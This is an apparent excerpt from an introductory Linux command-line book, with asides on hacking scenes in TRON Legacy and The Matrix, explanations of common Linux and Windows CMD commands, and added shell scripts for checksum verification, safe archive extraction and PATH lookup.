Figure 16. Sam uploading a script
So how are computers used on TRON Legacy?
The movie opens with a scene in which Sam tries to steal the new operating
system from ENCOM, his father's company, of which he is majority shareholder.
As the hack progresses Alan Bradley informs the board their OS is on the
internet. Cillian Murphy's character Edward Dillinger, Jr. (a reference to a
character from the first movie) tries to stop the hack. Below I will discuss,
with screenshots taken from the movie, what actions he performs. With your
limited knowledge of the Linux CLI from just one chapter a lot should look
familiar.

Figure 17. Cillian Murphy as Edward Dillinger Jr.

Dillinger has just typed in the following series of commands on one line with
root (#) access.
# ps -ef | grep -i os12
The first part, ps -ef, lists all processes. With the pipe | its output is fed
as input to the command on the right. grep -i os12 finds all processes whose
command line includes the string 'os12'; the -i switch makes the match
case-insensitive. OS12 is the name of the operating system Sam is trying to
steal. So now Dillinger has found two such processes. The one with number
17319 is the hack started by Sam, while 18458 is the command Dillinger
started.

Figure 18. Dillinger uses PS and Grep


In the next screenshot Dillinger ends the hack by entering the following on
the command line.
# kill -9 17319
The switch -9 ensures 'execution'.

Figure 19. Dillinger kills the hack

Figure 20. Sam uses the touchscreen interface


Later on in the movie!
At Kevin Flynn's arcade Sam attempts to figure out why Alan received a page
from a number disconnected for 20 years. Sam starts off carefully. With
commands such as whoami and uname -a he tries to understand the basics of the
system. With the command history Sam Flynn tries to uncover the last thing
that his father did on this particular machine before he disappeared.

Figure 21. Using the History command


As you can see, the command on line 488 was a change of directory, while 489
opened LLSDLaserControl.c with the text editor vi; changes were made to the
program, but that is not evident from the command line history. On lines 490
and 491 Kevin Flynn used the utility make to compile all the code and turn it
into executable files. On line 492 he runs the program sanity_check, on line
493 he runs configure, but makes alterations to it with vi on line 494.
Finally, on line 495 he again uses vi to edit a file called
last_will_and_testament.txt.

The command ps on line 497 gives a snapshot of the current processes. The
switches -a -x -u declare that all processes, including those not attached to
a terminal and those of other users, should be shown. Lines 498 and 499 show
examples of the kill command, whereby processes are discontinued by the user.
On line 500 the ps command is once again run before Kevin Flynn updates the
timestamps of all files in the folder /opt/LLL/run/ok. Finally, on line 501
the program LLSDLaserControl is run with the switches -ok 1, which allows
Kevin to be transported onto the GRID.
In the screenshot above there are also two other windows open. The top one
shows all running processes, such as Xorg and init, while the bottom window
reveals the operating system to be Sun Solaris (now owned by Oracle) on an x86
system. Officially the first version of Sun Solaris wasn't released until
1992, though development had commenced five years before. Astute readers may
remember that Linux wasn't released until 1991. Most commands discussed in
this book so far are POSIX-compliant. This means they have implementations in
other operating systems as well and use a common command interface. As such
you can use commands such as grep, ps and history on many other systems, such
as Mac OS X, the Berkeley Software Distributions (FreeBSD, NetBSD and
OpenBSD), AIX and HP-UX.
Although not many people know this, the title TRON refers to the program Alan
Bradley wrote in the first movie. Tron allowed for unscheduled process
activity to be shut down and safeguard computer systems from a takeover. In
the old dialects of BASIC the command you used to debug was TRON[2] (an
abbreviation of ‘TRace ON’). The command printed out the line number that
the computer executed at that moment which allowed software engineers to
trace events as they unfolded. The command TRON had an opposite with
TROFF or ‘Trace OFF’ which would switch off tracing. Most modern versions
of BASIC such as Microsoft Visual BASIC no longer support TRON[3].
I hope you had fun reading this little excursion and don’t forget to check out
TRON and TRON Legacy!

Chapter 2 Linux file operations
In this chapter I will discuss how a Linux user can perform file operations.
This includes downloading files and programs, extracting (unzipping) files
and running programs from the command line. For many users this is where
Linux shows its main weakness compared to operating systems such as Windows
and OS X. Often Linux downloads are offered in formats such as .tar, .bz, .gz
and variations. Without knowing how to extract a file it is impossible to
know which to download. Even if you manage to unzip a file you cannot double
click on a program to run it. At least, not always, though some distros do
aid the user in trying. Only those programs that are installed through the
Ubuntu Software Center have a nice clickable icon, but most open source
programs lack those.
Whereas the previous chapter taught you how to find your way through the
Linux file system without using a GUI, this chapter completes the circle and
teaches you to use Linux to run programs.

Downloading Linux programs
wget
wget is short for World Wide Web get, which gives users an indication as to
its purpose. Officially the tool's purpose is described as retrieving content
from web servers. Of course that could mean anything; in fact wget allows you
to download individual files, should you know their full URL, or the content
of an entire website, or just a part of it. An example of downloading only the
front page of a website would be
username@ubuntu:~$ wget http://www.example.com/
To download a file it is normally easier to use a browser such as Firefox or
Chrome. The file, should it contain a program, should be for Linux use only
and probably has the extension .tar.gz or a derivative thereof (and there are
many, as mentioned). However, if you can only use the command line because
there is no GUI, or there are verification steps in the way, and you have the
exact URL, then use wget. The example command below shows how to download the
latest version of Ubuntu (16.04).
username@ubuntu:~$ wget http://releases.ubuntu.com/16.04/ubuntu-16.04-desktop-amd64.iso?_ga=1.77023125.1846713753.1467201332

Figure 22. Downloading Ubuntu with wget
Presumably you have no real need to do this, but any file of any size can be
downloaded. wget has more functions than just downloading files. On one
software project wget was used to transmit commands across systems to bypass
the firewall. It was an application of wget I did not approve of. An
alternative to wget is cURL, which performs almost exactly the same task.
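Downloading an installer image is only half the job: before the file is trusted, its checksum should be compared with the one the publisher lists. The script below is an added example, not code from the book. It uses the SHA256SUMS format that Ubuntu publishes next to its images, but the sample file and checksum list are constructed locally so the script runs offline; the function names are my own.

```shell
#!/bin/sh
# Added example: verify a downloaded file against the publisher's SHA256SUMS
# before using it. Ubuntu publishes SHA256SUMS next to its ISO images; the file
# and checksum below are constructed locally so the script runs offline.

# Fetch a URL into a local file with wget (not called by the demo, which is
# offline). -q silences progress output, -O names the output file.
fetch() {
    wget -q -O "$2" "$1"
}

# Print only the hex SHA256 digest of a file.
digest_of() {
    sha256sum "$1" | awk '{print $1}'
}

# Check a file against a SHA256SUMS-style list ("<digest>  <name>" per line,
# "*<name>" for entries written in binary mode). Returns 0 when the digest
# matches, 1 when it differs or the file is not listed at all.
verify_against_sums() {
    file=$1
    sums=$2
    expected=$(awk -v f="$file" '$2 == f || $2 == "*" f {print $1}' "$sums")
    [ -n "$expected" ] || return 1
    [ "$(digest_of "$file")" = "$expected" ]
}

# Constructed demo: a fake image, a matching SHA256SUMS, then a tampered copy.
demo() {
    dir=$(mktemp -d)
    printf 'pretend this is an ISO image\n' > "$dir/sample.iso"
    printf '%s  sample.iso\n' "$(digest_of "$dir/sample.iso")" > "$dir/SHA256SUMS"
    if ( cd "$dir" && verify_against_sums sample.iso SHA256SUMS ); then
        untouched=ok
    else
        untouched=bad
    fi
    # Append one byte: even this small change must make the check fail.
    printf 'x' >> "$dir/sample.iso"
    if ( cd "$dir" && verify_against_sums sample.iso SHA256SUMS ); then
        tampered=ok
    else
        tampered=bad
    fi
    rm -rf "$dir"
    echo "untouched:$untouched tampered:$tampered"
}

demo
```

With a real download you would run fetch on the image URL and on the SHA256SUMS URL from the same release directory, then verify_against_sums on the two local files; a mismatch means the file is corrupt or has been altered in transit and should not be installed.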

scp
With the command scp, or Secure Copy, users can move files to and from
different host computers. Essentially SCP starts an SSH connection (like
Telnet, but encrypted), performs the desired file transfer and immediately
closes the connection when the transfer is finished. SCP is not always a
convenient command to use. Where possible I would advise the use of a
GUI-based file transfer application such as FileZilla. Nonetheless, knowing
this command is important. The basic syntax is as follows.
Copy a file from a remote host to your local computer
username@ubuntu:~$ scp your_username@remotehost.edu:foobar.txt /some/local/directory
Copy a file from your local computer to a remote host
username@ubuntu:~$ scp foobar.txt your_username@remotehost.edu:/some/remote/directory
You can also copy two or more files at once, and designate the port to use.
A directory can be copied with the -r flag.
username@ubuntu:~$ scp -r foo your_username@remotehost.edu:/some/remote/directory/bar
Copy a file from one remote host to another
username@ubuntu:~$ scp your_username@rh1.edu:/some/remote/directory/foobar.txt \
your_username@rh2.edu:/some/remote/directory/
SCP may not be technically difficult, but typing in the correct file and
directory names is prone to typos. FileZilla is so much easier, but if you are
working on an embedded system that has only a 400 MHz ARM processor and 64 MB
of RAM you may have no choice but to use SCP. To install FileZilla just
execute the following two commands
username@ubuntu:~$ sudo apt-get update
username@ubuntu:~$ sudo apt-get install filezilla

Find Linux programs
find
If you can't find the file you just downloaded with wget you can use the find
program to do so. An example would be:
username@ubuntu:~$ find / -name 'example.tar.gz'
The forward slash / means that the find program should start looking from the
root folder down into all other system folders. If you have a better idea
where your file is and want to speed up the search, then give that partial
directory instead. The switch -name means that we only want the command to
look at the filename in its search. Finally, between two single quotes ' ' we
give find the name, or part of the name, as a string for its search effort.
Users can also let the shell auto-complete the final name. Output for find
could be as follows
/home/username/Downloads/example.tar.gz

Figure 23. Find a file called my_file


Above is an example of the use of the find command. Note how I used sudo to
execute the command as root. If I don’t I will get a very long list of messages
telling me ‘Permission Denied’ to search a folder for a file.

Unzip Linux programs
I mentioned there are many archive extensions for Linux. The most popular are
.tar, .gz and .tar.gz. Files with these extensions can be unzipped and
untarred with the following commands.

tar
After you have downloaded a file with the extension .tar.gz you can't do much
with it. Most Linux operating systems allow you to unzip and untar a file from
the GUI by just double clicking on it. The user is then asked whether
extracting the file is desired. However, should you only have access to the
command line, then tar is your go-to program. It works for both .tar and .gz.
tar, or tape archive, is used to bundle many files into one archive file.
Often a compression algorithm such as gzip is run afterwards to reduce the
file size.

The tar command has its share of switches. This text will merely give an
overview of those that are needed to perform the most basic tasks. An example
follows of using the tar program on a hypothetical file called example.tar.gz
that we just downloaded using wget.
username@ubuntu:~$ tar -xvzf example.tar.gz
The switch -x means that we wish to extract the archive. Note that it is the
first switch. -v gives us an overview of all the files that are extracted; it
can be omitted for brevity. -z decompresses the file using gzip. This is an
example of a program calling a program through a switch rather than a pipe.
-f is the last switch because it takes an argument: the name and path of the
compressed file.

gzip and gunzip
Of course you can also use the gzip program on its own in the command line to
decompress files. To do so you use the command gunzip (GNU unzip - get it)
followed by the filename.
username@ubuntu:~$ gunzip example.tar.gz
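The steps from the find and tar sections above (locate the downloaded archive, then extract it with tar -xzf) as one runnable script. This is an added example, not the book's own code; the directory, archive and file names are constructed for the demo. It adds a check the chapter does not mention: listing the archive with tar -t first and refusing members with absolute or .. paths, which tar would otherwise write outside the directory you extract into.

```shell
#!/bin/sh
# Added example: find a downloaded archive, list what it contains, and extract
# it only when no member path escapes the target directory. Directory, archive
# and file names are constructed for the demo; nothing here comes from the book.

# Locate an archive by name under a starting directory, as "find / -name" does
# from the root. 2>/dev/null hides "Permission denied" for unreadable folders,
# which is an alternative to running the search with sudo.
locate_archive() {
    find "$1" -name "$2" 2>/dev/null
}

# Print the member list without extracting anything (-t list, -z gzip, -f file).
list_archive() {
    tar -tzf "$1"
}

# Refuse archives with absolute member paths or ".." components: such members
# would be written outside the directory you extract into.
archive_is_safe() {
    list_archive "$1" | grep -E '^/|(^|/)\.\.(/|$)' >/dev/null && return 1
    return 0
}

# Extract into a target directory after the safety check
# (-x extract, -z gunzip, -f file, -C change into the target first).
extract_archive() {
    archive_is_safe "$1" || return 1
    mkdir -p "$2"
    tar -xzf "$1" -C "$2"
}

# Build a well-formed example.tar.gz from a constructed tree; print its path.
make_sample_archive() {
    mkdir -p "$1/example/docs"
    printf 'hello from the archive\n' > "$1/example/README"
    printf 'more text\n' > "$1/example/docs/notes.txt"
    ( cd "$1" && tar -czf example.tar.gz example )
    echo "$1/example.tar.gz"
}

# Build an archive whose member keeps its absolute path (GNU tar -P), the kind
# the safety check above is meant to catch; print its path.
make_unsafe_archive() {
    mkdir -p "$1/example"
    printf 'should never be extracted\n' > "$1/example/outside.txt"
    tar -cPzf "$1/unsafe.tar.gz" "$1/example/outside.txt"
    echo "$1/unsafe.tar.gz"
}

demo() {
    work=$(mktemp -d)
    archive=$(make_sample_archive "$work")
    echo "find located: $(locate_archive "$work" 'example.tar.gz')"
    echo "members:"
    list_archive "$archive"
    extract_archive "$archive" "$work/out" && echo "README says: $(cat "$work/out/example/README")"
    unsafe=$(make_unsafe_archive "$work")
    extract_archive "$unsafe" "$work/out2" || echo "refused $unsafe: unsafe member path"
    rm -rf "$work"
}

demo
```

The listing step is cheap and worth keeping even outside a script: tar -tzf shows exactly where an archive from an unknown source will put its files before anything is written.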

Open and run a Linux program
After you have downloaded a program and unpacked its binaries you can attempt
to run it. By a bare name, Linux can only run files that can be found on your
search path, $PATH. For example, typing the command ls, which is actually a
little program, tells Linux to run a file called ls if it is in your $PATH. It
of course is, otherwise you would not have been able to run the program and
see the results as it lists all files in the directory you are currently in.
To see what your current $PATH is just type echo $PATH. You should get a
result like the following line
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
At first this looks like something a program might spit out as an error
message when it has a bad day, but you will remember these directories from
chapter 0. They are the locations of all the binaries (runnable code). The
shell looks in these directories, in order, for the program you entered. In
this case six folders are searched.
/usr/local/sbin:
/usr/local/bin:
/usr/sbin:
/usr/bin:
/sbin:
/bin

Now, for any executable that is not in a directory on your $PATH you need to
tell the shell explicitly where to find it. Assuming that you have navigated
with the command cd to the correct folder, you need to type in ./programname
to run the executable.
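The search the shell performs, written out as a script so you can see the rule behind ./programname. This is an added example, not from the book; the function names and the two directories built in the demo are constructed. It also shows why the current directory is left off $PATH: the first matching directory wins, so a writable directory early on the path would let a planted file shadow a real command.

```shell
#!/bin/sh
# Added example: how the shell resolves a bare command name against $PATH, and
# why a program in the current directory has to be run as ./name. Function
# names and the directories in the demo are constructed.

# Walk the directories of a PATH string left to right and print the first
# executable file named $1. Returns 1 if none holds such a file, which is the
# situation behind "command not found". The PATH to search is $2, or $PATH.
lookup_in_path() {
    name=$1
    searchpath=${2:-$PATH}
    old_ifs=$IFS
    IFS=:
    for dir in $searchpath; do
        # An empty entry ("::" or a leading/trailing ":") means the current
        # directory; that is the same hazard as putting "." in $PATH.
        [ -n "$dir" ] || dir=.
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            IFS=$old_ifs
            echo "$dir/$name"
            return 0
        fi
    done
    IFS=$old_ifs
    return 1
}

# Why "." is left out of $PATH: whichever directory comes first wins, so a
# writable directory early on the path lets a file planted there shadow a real
# command. Two constructed directories each hold a script called "ls".
demo_shadowing() {
    work=$(mktemp -d)
    mkdir -p "$work/safe" "$work/untrusted"
    printf '#!/bin/sh\necho real ls\n' > "$work/safe/ls"
    printf '#!/bin/sh\necho planted ls\n' > "$work/untrusted/ls"
    chmod +x "$work/safe/ls" "$work/untrusted/ls"
    first=$(lookup_in_path ls "$work/safe:$work/untrusted")
    second=$(lookup_in_path ls "$work/untrusted:$work/safe")
    rm -rf "$work"
    # Print the two winners relative to the temp dir: "safe/ls untrusted/ls".
    echo "${first#$work/} ${second#$work/}"
}

echo "ls resolves to: $(lookup_in_path ls)"
lookup_in_path not_a_real_command_zz || echo "not_a_real_command_zz: command not found"
echo "first directory on the path wins: $(demo_shadowing)"
```

The real shell adds a cache of resolved names on top of this walk (see the hash builtin), but the ordering rule is the same, which is why administrators keep system directories first and user-writable ones last, or off the path entirely.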

cat
With the cat command we can print the contents of a file to the terminal,
without opening a text editor. Of course this is not the same as running a
program. If we were to cat a compiled program we would see incomprehensible
binary garbage displayed, but for text files such as source code it is very
useful. The cat output is displayed in the terminal.

gedit
To make any permanent changes to files you will need to use a text editor.
They come in two varieties: those that have GUIs and those that work in the
command line. gedit is a simple text editor that can be found on operating
systems featuring the GNOME desktop environment. Ubuntu has gedit installed
as the default editor. On Kali Linux you will have to use the Aptitude repos
to install it.
gedit may not have many features, but it is light-weight and it does have
syntax highlighting. If you open a new file with gedit and give the filename
an established extension that refers to a programming language, then you get
syntax highlighting. Syntax highlighting assigns nice candy colors to certain
parts of a program's language. It improves readability, allowing quick
debugging.
Below is an example of opening a file in gedit which has the extension .c. As
the file does not yet exist it will be created. The extension makes it clear
this will be a program written in C and appropriate syntax highlighting is
used.
username@ubuntu:~$ gedit helloworld.c
In the blank file that appears as a pop-up input the following lines.
#include <stdio.h>
int main(void) {
    printf("hello, world\n");
}

After you have finished typing press save to store the file. You have just
created your first program! As you may guess from looking at the code, it will
print the words 'hello, world' to the command line. It is an example
popularized by authors Brian Kernighan and Dennis Ritchie in their book The C
Programming Language, first published in 1978. In chapter 3 of Part 2 I will
go into detail on the C programming language. The example above is often used
to determine whether a compiler has been properly installed. The system cannot
as of yet run the code. The CPU only understands binary '010101'. We first
need to compile the source code to executable code. This is accomplished with
GCC, or GNU Compiler Collection, the default compiler on Linux. GCC is quite
versatile. It can also compile other languages, ranging from FORTRAN and Java
to the Objective-C used with Mac OS X.
The following command executes gcc to create the executable code.
username@ubuntu:~$ gcc helloworld.c -o helloworld
If you use the list command ls you will notice a file has been added to your
directory besides helloworld.c. It is called helloworld. We could have called
it anything we like, but generally it is better to name it after the source
code file (helloworld.c). In fact, if you specify no name at all (omit -o)
gcc will create the executable code and call the file a.out.
To run the code type in the following command. Don't type the extension .c!
username@ubuntu:~$ ./helloworld
The output should simply be
hello, world

Figure 24. Editing, compiling and running a C program


If gcc didn't complete the compilation you may have a typo somewhere. To give
you a clue about what may have gone wrong I will briefly explain what the
program does.
1. #include <stdio.h> - imports a library which contains the code for the
function printf.
2. int main(void) { - starts the program; every program written in C needs
exactly one main function, which is where execution begins.
3. printf("hello, world\n") - prints the string to standard output.
4. } - closes the curly brace opened on the second line. Such braces are
often used in programming languages to delimit logic.

Advanced commands
I conclude this chapter with two commands that let you see how many system
resources you are using. They can be important when you download and unpack
large files. Linux has a lot of neat commands that show just what the system
is doing. Below are several advanced 'household' commands that

du
The du, or disk usage, command shows how much space the files under the
current directory take up on your hard drive.

username@ubuntu:~$ du

free -m
With this command you can see how much RAM your system is using. As most
modern laptop and desktop computers come with at least several GB of RAM you
are not quickly going to run out of space. However, the same cannot be said
for tablets, smartphones or embedded computers. The free -m command shows how
much RAM you have left, in megabytes.

Figure 25. Example of Free -m

Figure 26. Carrie-Anne Moss as Trinity in The Matrix

EXTRA:
The Matrix:
God-Mode
When The Matrix was released in 1999 it marked the end of an era. For the
first time computer generated effects could hardly be distinguished from
reality. Yet, more than that, it fulfilled the desire of every gamer.
What if you had god-mode in a world that mattered?
The movie, directed by Lana and Lilly Wachowski, was inspired by works
such as Neuromancer by author William Gibson and Hong Kong action cinema.
The Wachowskis managed to add to that their own unbridled inspiration
culminating in many geeks (including myself) practicing their Kung Fu in front
of a mirror.

The Matrix is set in a world similar to our own, but different. Thomas
Anderson (Keanu Reeves) has always known this. By day he works as a
programmer at a dreary corporation, but by night he is a hot-shot hacker going
by the handle Neo. One such night he receives a mysterious invitation to a
night club, where he meets a hacker named Trinity (Carrie-Anne Moss). Together
with her colleagues Morpheus, Switch and Tank she manages to convince him he
lives in a computer-generated reality. They free his mind from this world,
and his body from the slush tank in which the machines have kept him. Now Neo
can enter the computer world, The Matrix, whenever he wants. His knowledge
allows him to perform any kind of feat he wants. Yet the agents of the
machines also have special powers and will do anything to stop him from
freeing more people.

Figure 27. Keanu Reeves as Neo

The topic of simulated realities has been tried before in movies. Most are
mediocre at best: TRON, Source Code and Brazil. But a few, such as Dark City
and The Matrix, managed to hit the mark. If you want to know more about what
inspired the Wachowskis, read the aforementioned book Neuromancer and the
other works of William Gibson. Another excellent work is Neal Stephenson's
Snow Crash, featuring a samurai-sword-wielding pizza courier who attempts to
retake his rightful place as the world's best hacker. I would fail in my
duties if I didn't also recommend Dan Simmons's Hyperion, a story in which
the good guys don't always win. In 2018 director Steven Spielberg will
release his movie adaptation of Ready Player One, a sci-fi novel by Ernest
Cline. Cline may well be one of the biggest geeks in the world. The story is
about Wade Watts, also known as Parzival, as he searches through OASIS, a
Matrix-inspired digital universe, for clues to solve the puzzle left by OASIS
founder James Halliday. Whoever solves the puzzle will get control of OASIS,
which explains why corporate entities are trying to kill Parzival. Ready
Player One is a veritable orgy of 80s references. Entire scenes from WarGames
and Blade Runner are played out. Not to mention the dozens of references to
games such as Zork, Pac-Man and Joust as well as movies such as Star Wars and
the works of John Hughes. As a hacker I can highly recommend the novel, and
most of the material referenced.

Figure 28. Neo meets Trinity


The Matrix spawned two sequels as well as several games. I suggest you try
Enter The Matrix and Path of Neo. Both featured a hacking mini-game using
commands inspired by the Windows CMD. Take a look at the commands below and
try them out on your Windows system. We will be revisiting Windows as a side
excursion a few more times in this book. Enter The Matrix was released back in
2003 and its graphics have sadly not stood the test of time; try out the PC
version and don't forget to patch it thoroughly to avoid the square car
tires.

Figure 29. An example of hacking in Enter The Matrix

CMD
CMD, also known as CMD.exe or the Command Shell, is the Windows analogue of
the Linux shell. It can trace its origins back to the COMMAND.COM interface
of the original MS-DOS. CMD can at best be described as a limited version of
a Linux shell; it simply doesn't offer the breadth of functionality. This can
be traced back to the proprietary nature of MS-DOS and Windows. Please note
that most CMD commands are NOT case sensitive. By convention CMD commands are
often printed in upper-case letters, but for most commands this is not
necessary.

echo
The echo command prints any designated line as output onto the command line.
Quotes and ticks don’t matter, they will be printed as well.

Figure 30. The echo command in Windows

dir
The command dir stands for directory. It is the equivalent of ls. The command
has numerous flags; type /? after dir to see them. /S would also print file
names in sub-directories. I find the vanilla dir command suits me for most
purposes.

Figure 31. The directory listing command

copy
With copy you can copy files around. The syntax is simple: copy hello.txt
[destination], where the destination is a Windows directory and thus you have
to take into account the backslash. If you have a folder named Hello in your
present directory then the correct command would be
copy letter.txt C:\Users\Name\Hello

move
This command is very similar to copy, but it does not copy a file and retain
the original. Instead, just like the Linux command mv, it cuts a file or
directory and pastes it into the designated directory.
move letter.txt C:\Users\Name\Hello

ipconfig
No, this command does not contain a typo; its name is similar to ifconfig from
Linux. In fact the commands do practically the same thing. You get an overview
of all your network connections and you can discover your own IP address.
Adding the switch /? gives an overview of the possible options. Add /all for a
very verbose overview of your network connections.

ping
With ping you can quickly check whether a host is reachable and how long a
round trip to it takes. Unlike the Linux version, which keeps going until you
stop it, the Windows version sends four echo requests and then stops (add -t to
run continuously). The round-trip time in milliseconds measures latency, not
bandwidth: it tells you how responsive a connection is, not how fast a
download will be. Also keep in mind that many hosts and firewalls drop ICMP
echo requests, so a failed ping does not prove that a host is down. Below
Google.com is used as an example.

Figure 32. Ping on google

tracert
With tracert you get an overview of all the hops (routers) between you and a
remote host. It is a good tool to find out where along the path a connection
fails, or whether your traffic is taking an unexpected route. Just like with
ping you name the host you wish to contact. Hops that do not answer show up as
asterisks, which is normal for routers configured to ignore such probes; a row
of asterisks is only a problem if nothing after it answers either. In essence
tracert is a hop-by-hop version of ping.

Figure 33. Tracert on google

cipher
When you delete a file on Windows the file system only marks the space it
occupied as free; the data itself stays on the disk until something overwrites
it, and recovery tools can read it back. To prevent this you can use cipher,
a command that is normally used to manage EFS (Encrypting File System)
encryption. With the /W switch cipher overwrites all unallocated space on the
volume that holds the given directory, first with zeros, then with ones, then
with random data, so that previously deleted files can no longer be recovered
from that volume. Note what it does not do: it does not delete or touch
existing files, and on SSDs wear levelling means an overwrite is no guarantee,
so full-disk encryption is the more reliable protection for sensitive data. I
should warn that cipher can do real damage if you get the switches wrong: /E
ties files to the user's EFS certificate, and if that key is lost the files
are unreadable for good. Below are three commonly used variations of cipher.

Example                           Purpose
C:\Users> cipher /W:directory     Overwrite the free space on the volume that holds directory
C:\Users> cipher /E directory     Mark directory so that files placed in it are encrypted with EFS
C:\Users> cipher /D directory     Remove the encryption mark from directory again

This set of commands, along with cd (Change Directory), should allow you to
find your way around Windows. We will revisit the Windows command line later.
Its successor, Windows PowerShell, will also be featured, as well as batch
programming, so that you gain a broad knowledge base.

Chapter 3 Advanced Linux Commands
After going through the previous chapters of Linux commands you should have
developed a grasp of how to perform most of your chores through the terminal.
Yet a lot of tasks rely on multiple commands chained together, which is done
through the pipe symbol |. I teased this feature in an earlier chapter, but
now we will delve into it properly. Readers will also learn how to save the
output of a Linux command in a file. Finally this chapter will discuss
commands that show what is going on under the hood of your Linux system, such
as ifconfig and dmesg.

Directing output
Output from a command can be used in two ways. It can be saved by
redirecting or appending it to a file, or it can be used as input for a
follow-up command through piping. Let's start with saving output to a file.
There are two versions: redirect and append.

Redirect
To save the output of a command to a file rather than print it to the terminal,
add the redirect symbol '>' followed by a file name to the command.
username@ubuntu:~$ ps > processes.txt
The example above saves all output from the ps command to a file called
processes.txt. If the file doesn't exist yet it is created automatically; there
is no need to create it beforehand. The file is created in the current working
directory; to save the output elsewhere, give the full path. Redirect
overwrites the file: every time you run the command above the earlier list of
processes in the text file is replaced. Also note that '>' only captures
standard output. Error messages go to a separate stream, standard error, and
still appear on the terminal unless you redirect that too, with 2> for the
errors alone or 2>&1 to send both streams to the same place.

Append
With two redirect symbols '>>' the output is appended behind whatever is
already stored in the file, which is what you want for anything that
accumulates over time, such as a log.
username@ubuntu:~$ ps >> processes.txt
The two examples above use the ps command, but the output of almost any Linux
command can be redirected in this way.

Piping
As mentioned in the introduction to this chapter, with piping we can chain
multiple Linux commands together. Such combinations become very powerful as
your skills increase. Novice Linux users may be tempted to keep away from
pipes and run commands separately, or use a text file as an intermediate step.
However, I dare you to try pipes. If at first you do not succeed...
username@ubuntu:~$ ps | grep bash
The example above feeds the output of ps into grep, which keeps only the lines
that contain bash. Yet this is a trivial example. A more elaborate pipeline is
the following.
username@ubuntu:~$ ps aux | grep conky | grep -v grep | awk '{print $2}' | xargs kill
1. ps aux lists all processes of all users, including those without a
terminal. The second column of the output is the process identifier or PID,
which is what kill needs later on.
2. grep conky keeps only the lines that contain the word conky. That includes
the grep conky process of our own pipeline, because its command line contains
the word too. Unless we remove that line, kill would also be handed the PID of
our own grep.
3. grep -v grep does exactly that: -v inverts the match and drops every line
that contains grep. Now we have a list of just one process.
4. awk '{print $2}' uses the awk scripting language to print the second field
of each remaining line, the PID. More on awk later.
5. xargs takes the input from the left side of the pipe and turns it into
arguments for kill. Like kill, commands such as cp and echo do not read their
input from a pipe, so xargs bridges the gap. In the end kill PID is executed
as the final step of the chain.
Note that the substring match also catches any other process whose command
line happens to contain conky, so in practice pgrep -x conky or pkill -x conky
is both shorter and safer for this job.
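The redirects and the pipeline above, as an added example that is not code from the book: the ps output is a constructed listing embedded in the script (the process names and PIDs are invented), so the functions run anywhere grep and awk exist and nothing is actually killed. The listing, the function names and the scratch file are all assumptions of the example.

```shell
#!/usr/bin/env bash
# Added example, not from the book: redirect, append and the PID-extracting
# pipeline, run against a constructed `ps aux`-style listing so it works
# without a live conky process. Names and PIDs below are made up.

# Constructed sample in the column layout of `ps aux`.
SAMPLE_PS='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 167000 11000 ?        Ss   09:00   0:01 /sbin/init
user      2311  0.3  0.5 420000 51000 ?        Sl   09:02   0:12 conky -c /home/user/.conkyrc
user      2390  0.0  0.0  12000  3000 pts/0    S+   09:05   0:00 grep conky
user      2450  0.1  0.2 350000 25000 ?        Sl   09:06   0:03 /usr/bin/conky-manager'

# The pipeline from the text: substring match, minus our own grep, PID is
# field 2. Reads ps output on stdin; $1 is the pattern.
pids_grep_style() {
    grep "$1" | grep -v grep | awk '{print $2}'
}

# A tighter filter: compare the command name (first word of COMMAND, which is
# field 11 in `ps aux` output) against an exact name, so conky-manager and any
# line that merely mentions conky in its arguments are not swept up.
# NR > 1 skips the header line.
pids_exact_name() {
    awk -v name="$1" 'NR > 1 && $11 == name {print $2}'
}

# Redirect versus append, and why stderr needs its own redirect.
# $1 is the output file; prints the number of lines that ended up in it.
redirect_demo() {
    out=$1
    printf '%s\n' "$SAMPLE_PS" | pids_grep_style conky  >  "$out"   # '>' truncates, then writes
    printf '%s\n' "$SAMPLE_PS" | pids_exact_name conky  >> "$out"   # '>>' adds to the end
    # A failing command: its complaint goes to stderr, which '>' alone would
    # leave on the terminal. 2>> sends it to a separate file instead.
    ls /nonexistent-dir-for-demo >> "$out" 2>> "$out.err" || true
    wc -l < "$out" | tr -d ' '
}

printf '%s\n' "$SAMPLE_PS" | pids_grep_style conky   # 2311 and 2450: conky-manager is caught too
printf '%s\n' "$SAMPLE_PS" | pids_exact_name conky   # 2311 only
```

In real use you would replace the printf with ps aux and end the pipeline with xargs -r kill (the -r stops xargs from running kill with no PIDs at all), or simply use pkill -x conky, which does the exact-name match for you.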

Advanced commands and tools
dhclient
One common network problem is that no IP address has been assigned. With
dhclient you request an IP address from the DHCP server on your network,
usually the router. The command needs root privileges and takes the name of
the interface to configure as its argument.

ifconfig
The ifconfig tool is used to query the current state of your network
interfaces. Run without arguments it prints that information to the terminal.
username@ubuntu:~$ ifconfig
The output could look something like the following.
eth0 Link encap:Ethernet HWaddr 78:a5:04:fd:c2:ac
inet addr:10.0.0.200 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::7aa5:4ff:fefd:c2ac/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1905 errors:0 dropped:0 overruns:0 frame:0
TX packets:170 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:505198 (493.3 KiB) TX bytes:22644 (22.1 KiB)
Interrupt:40

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:32876 errors:0 dropped:0 overruns:0 frame:0
TX packets:32876 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:14043222 (13.3 MiB) TX bytes:14043222 (13.3 MiB)

usb0 Link encap:Ethernet HWaddr ba:d9:53:94:72:8f
inet addr:192.168.7.2 Bcast:192.168.7.3 Mask:255.255.255.252
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Here eth0 is your Ethernet connection, lo is the loopback interface that every
machine has, and usb0 is a network connection over USB. Besides reporting,
ifconfig can also configure an interface. With the up and down arguments you
bring an interface up or take it down, which requires root privileges:
username@ubuntu:~$ sudo ifconfig eth0 up
username@ubuntu:~$ sudo ifconfig eth0 down
